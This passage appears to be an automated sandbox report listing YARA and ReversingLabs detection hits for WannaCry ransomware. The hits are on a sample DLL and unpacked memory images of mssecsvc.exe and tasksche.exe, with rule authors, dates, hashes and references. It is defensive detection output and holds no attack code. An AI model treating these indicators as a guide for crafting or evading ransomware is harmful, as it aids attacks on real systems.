              Source: y2jb4FtSNq.dll, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: y2jb4FtSNq.dll, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 31.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 31.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
